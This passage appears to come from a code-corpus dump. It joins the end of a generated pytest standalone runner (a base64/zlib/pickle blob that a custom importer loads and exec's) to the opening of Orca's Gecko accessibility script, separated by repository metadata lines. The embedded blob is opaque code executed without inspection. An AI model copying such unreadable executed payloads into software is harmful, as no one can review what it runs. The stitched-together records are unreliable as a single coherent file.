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
"""
import sys
import base64
import zlib
class DictImporter(object):
def __init__(self, sources):
self.sources = sources
def find_module(self, fullname, path=None):
if fullname == "argparse" and sys.version_info >= (2,7):
# we were generated with <python2.7 (which pulls in argparse)
# but we are running now on a stdlib which has it, so use that.
return None
if fullname in self.sources:
return self
if fullname + '.__init__' in self.sources:
return self
return None
def load_module(self, fullname):
# print "load_module:", fullname
from types import ModuleType
try:
s = self.sources[fullname]
is_pkg = False
except KeyError:
s = self.sources[fullname + '.__init__']
is_pkg = True
co = compile(s, fullname, 'exec')
module = sys.modules.setdefault(fullname, ModuleType(fullname))
module.__file__ = "%s/%s" % (__file__, fullname)
module.__loader__ = self
if is_pkg:
module.__path__ = [fullname]
do_exec(co, module.__dict__) # noqa
return sys.modules[fullname]
def get_source(self, name):
res = self.sources.get(name)
if res is None:
res = self.sources.get(name + '.__init__')
return res
if __name__ == "__main__":
if sys.version_info >= (3, 0):
exec("def do_exec(co, loc): exec(co, loc)\n")
import pickle
sources = sources.encode("ascii") # ensure bytes
sources = pickle.loads(zlib.decompress(base64.decodebytes(sources)))
else:
import cPickle as pickle
exec("def do_exec(co, loc): exec co in loc\n")
sources = pickle.loads(zlib.decompress(base64.decodestring(sources)))
importer = DictImporter(sources)
sys.meta_path.insert(0, importer)
entry = "import pytest; raise SystemExit(pytest.cmdline.main())"
do_exec(entry, locals()) # noqa
|
dmargala/tpcorr
|
runtests.py
|
Python
|
mit
| 236,863
|
[
"Elk"
] |
b1dde6cfd35b8be1183cf1cf35efaa310e6f4ce3ed33dfb881c3fba1f0ab7d04
|
# Orca
#
# Copyright 2005-2009 Sun Microsystems Inc.
# Copyright 2010 Orca Team.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., Franklin Street, Fifth Floor,
# Boston MA 02110-1301 USA.
# [[[TODO: WDW - Pylint is giving us a bunch of errors along these
# lines throughout this file:
#
# E1103:4241:Script.updateBraille: Instance of 'list' has no 'getRole'
# member (but some types could not be inferred)
#
# I don't know what is going on, so I'm going to tell pylint to
# disable those messages for Gecko.py.]]]
#
# pylint: disable-msg=E1103
"""Custom script for Gecko toolkit.
Please refer to the following URL for more information on the AT-SPI
implementation in Gecko:
http://developer.mozilla.org/en/docs/Accessibility/ATSPI_Support
"""
__id__ = "$Id$"
__version__ = "$Revision$"
__date__ = "$Date$"
__copyright__ = "Copyright (c) 2010 Orca Team."
__license__ = "LGPL"
from gi.repository import Gtk
import pyatspi
import time
import urllib.parse
import orca.braille as braille
import orca.cmdnames as cmdnames
import orca.debug as debug
import orca.scripts.default as default
import orca.eventsynthesizer as eventsynthesizer
import orca.guilabels as guilabels
import orca.input_event as input_event
import orca.keybindings as keybindings
import orca.liveregions as liveregions
import orca.messages as messages
import orca.object_properties as object_properties
import orca.orca as orca
import orca.orca_state as orca_state
import orca.settings as settings
import orca.settings_manager as settings_manager
import orca.speech as speech
import orca.speechserver as speechserver
from . import keymaps
from . import script_settings
from .braille_generator import BrailleGenerator
from .speech_generator import SpeechGenerator
from .formatting import Formatting
from .bookmarks import GeckoBookmarks
from .structural_navigation import GeckoStructuralNavigation
from .script_utilities import Utilities
from orca.orca_i18n import _
from orca.speech_generator import Pause
from orca.acss import ACSS
_settingsManager = settings_manager.getManager()
########################################################################
# #
# Script #
# #
########################################################################
class Script(default.Script):
"""The script for Firefox."""
####################################################################
# #
# Overridden Script Methods #
# #
####################################################################
def __init__(self, app):
default.Script.__init__(self, app)
# Initialize variables to make pylint happy.
#
self.arrowToLineBeginningCheckButton = None
self.changedLinesOnlyCheckButton = None
self.controlCaretNavigationCheckButton = None
self.minimumFindLengthAdjustment = None
self.minimumFindLengthLabel = None
self.minimumFindLengthSpinButton = None
self.sayAllOnLoadCheckButton = None
self.skipBlankCellsCheckButton = None
self.speakCellCoordinatesCheckButton = None
self.speakCellHeadersCheckButton = None
self.speakCellSpanCheckButton = None
self.speakResultsDuringFindCheckButton = None
self.structuralNavigationCheckButton = None
# _caretNavigationFunctions are functions that represent fundamental
# ways to move the caret (e.g., by the arrow keys).
#
self._caretNavigationFunctions = \
[Script.goNextCharacter,
Script.goPreviousCharacter,
Script.goNextWord,
Script.goPreviousWord,
Script.goNextLine,
Script.goPreviousLine,
Script.expandComboBox,
Script.goTopOfFile,
Script.goBottomOfFile,
Script.goBeginningOfLine,
Script.goEndOfLine]
self._liveRegionFunctions = \
[Script.setLivePolitenessOff,
Script.advanceLivePoliteness,
Script.monitorLiveRegions,
Script.reviewLiveAnnouncement]
if script_settings.controlCaretNavigation:
debug.println(debug.LEVEL_CONFIGURATION,
"Orca is controlling the caret.")
else:
debug.println(debug.LEVEL_CONFIGURATION,
"Gecko is controlling the caret.")
# We keep track of whether we're currently in the process of
# loading a page.
#
self._loadingDocumentContent = False
self._loadingDocumentTime = 0.0
# In tabbed content (i.e., Firefox's support for one tab per
# URL), we also keep track of the caret context in each tab.
# the key is the document frame and the value is the caret
# context for that frame.
#
self._documentFrameCaretContext = {}
# During a find we get caret-moved events reflecting the changing
# screen contents. The user can opt to have these changes announced.
# If the announcement is enabled, it still only will be made if the
# selected text is a certain length (user-configurable) and if the
# line has changed (so we don't keep repeating the line). However,
# the line has almost certainly changed prior to this length being
# reached. Therefore, we need to make an initial announcement, which
# means we need to know if that has already taken place.
#
self.madeFindAnnouncement = False
# We don't want to prevent the user from arrowing into an
# autocomplete when it appears in a search form. We need to
# keep track if one has appeared or disappeared.
#
self._autocompleteVisible = False
# Create the live region manager and start the message manager
self.liveMngr = liveregions.LiveRegionManager(self)
# We want to keep track of the line contents we just got so that
# we can speak and braille this information without having to call
# getLineContentsAtOffset() twice.
#
self._previousLineContents = None
self.currentLineContents = None
self._nextLineContents = None
# For really large objects, a call to getAttributes can take up to
# two seconds! This is a Firefox bug. We'll try to improve things
# by storing attributes.
#
self.currentAttrs = {}
# Last focused frame. We are only interested in frame focused events
# when it is a different frame, so here we store the last frame
# that recieved state-changed:focused.
#
self._currentFrame = None
# A dictionary of Gecko-style attribute names and their equivalent/
# expected names. This is necessary so that we can present the
# attributes to the user in a consistent fashion across apps and
# toolkits. Note that underlinesolid and line-throughsolid are
# temporary fixes: text_attribute_names.py assumes a one-to-one
# correspondence. This is not a problem when going from attribute
# name to localized name; in the reverse direction, we need more
# context (i.e. we can't safely make them both be "solid"). A
# similar issue exists with "start" which means no justification
# has explicitly been set. If we set that to "none", "none" will
# no longer have a single reverse translation.
#
self.attributeNamesDict = {
"font-weight" : "weight",
"font-family" : "family-name",
"font-style" : "style",
"text-align" : "justification",
"text-indent" : "indent",
"font-size" : "size",
"background-color" : "bg-color",
"color" : "fg-color",
"text-line-through-style" : "strikethrough",
"text-underline-style" : "underline",
"text-position" : "vertical-align",
"writing-mode" : "direction",
"-moz-left" : "left",
"-moz-right" : "right",
"-moz-center" : "center",
"start" : "no justification",
"underlinesolid" : "single",
"line-throughsolid" : "solid"}
# Keep track of the last object which appeared as a result of
# the user routing the mouse pointer over an object. Also keep
